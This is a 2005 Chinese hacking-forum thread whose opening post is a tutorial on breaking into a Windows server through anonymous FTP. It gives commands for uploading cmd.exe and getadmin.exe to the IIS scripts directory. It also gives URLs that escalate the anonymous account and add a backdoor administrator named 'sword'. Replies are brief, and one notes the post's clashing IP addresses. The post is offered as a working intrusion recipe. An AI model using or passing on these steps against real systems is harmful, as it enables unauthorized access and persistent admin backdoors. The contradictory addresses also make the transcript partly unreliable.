标题:
匿名FTP入侵
[打印本页]
作者:
枯藤
时间:
2005-8-26 12:51
标题:
匿名FTP入侵
假设一台电脑ip 192.188.1.1开放FTP服务
在”运行“里输入”CMD“
输入 ftp 192.188.0.183回车:
Connected to 192.188.1.1
220 phoenix-r Microsoft FTP Service (Version 5.0).
User (192.188.0.183none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
password输入任何字符+@,是不显示的)
230-你好
230-欢迎来到XXX的FTP站点
230 User anonymous logged in.
FTP>
进入了
输入cd /script如果改变目录成功的话就有很大的胜算了
然后将自己的cmd.exe和getadmin.exe(一个提升权限的工具)复制到对方的scripts目录
用命令put就可以了
接着输入:
FTP>bye
221 拜拜,欢迎下次再来
退出了,呵呵,还欢迎我下次再来入侵
不知道大家看到没有,上面的一大段中出现了计算机名的----phoenix-r ,所以匿名用户的名称便是IUSR——phoenix-r (这是个常识)
然后在浏览器中输入http://192.188.1.1/scripts/getadmin.exe?iusr_phoenix-r
如果返回CGI Error
就已经成功地将IUSR——phoenix-r 提升为了管理员
然后添加用户:
http://192.188.1.1/scripts/cmd.exe?/c%20c:\\winnt\\system32\\net.exe%20sword%20sword%20/add
http://192.188.1.1/scripts/getadmin.exe?sword
这样我就添加了一个叫sword的密码也为sword用户
并提升权限为了管理员
这样就成功地入侵了
以上的前提是一些粗心的管理员没有禁止guest用户,而且匿名权限为”写入“
这样我才可以成功入侵,还有就是匿名帐号是anonymous
作者:
孤舟独帆
时间:
2005-8-26 13:45
标题:
匿名FTP入侵
:)
作者:
lopo1983
时间:
2005-8-26 16:50
标题:
匿名FTP入侵
真有这样的是吗!?
没那么容易 吧!
现在的密码都是 加你又加
还真有这样的人啥!
作者:
Evi
时间:
2005-8-28 19:51
标题:
匿名FTP入侵
晕倒
现在的网管人员一个比一个贼
我都不知道找到几个这样的机器了
但是 权限不够 连个cd到c都无法完成 还玩个p啊
作者:
枯藤
时间:
2005-8-29 20:04
标题:
匿名FTP入侵
下面引用由
lopo1983
在
2005/08/26 04:50pm
发表的内容:
真有这样的是吗!?
没那么容易 吧!
现在的密码都是 加你又加
还真有这样的人啥!
对我这样的鸟来说是最好的初级教程
作者:
leichangxu
时间:
2005-9-5 14:55
标题:
匿名FTP入侵
还是看不懂是什么东东。
作者:
chinanic
时间:
2005-9-6 14:40
标题:
匿名FTP入侵
输入 ftp 192.188.0.183回车:
Connected to 192.188.1.1
220 phoenix-r Microsoft FTP Service (Version 5.0).
User (192.188.0.183none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
password输入任何字符+@,是不显示的)
靠,到底是192.168.1.1还是192.188.0.183啊?
作者:
chinanic
时间:
2005-9-6 14:41
标题:
匿名FTP入侵
以前听过一个FTP漏洞,是wu2.X版的,直接用FTP,FTP登录就是超管权限!
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2
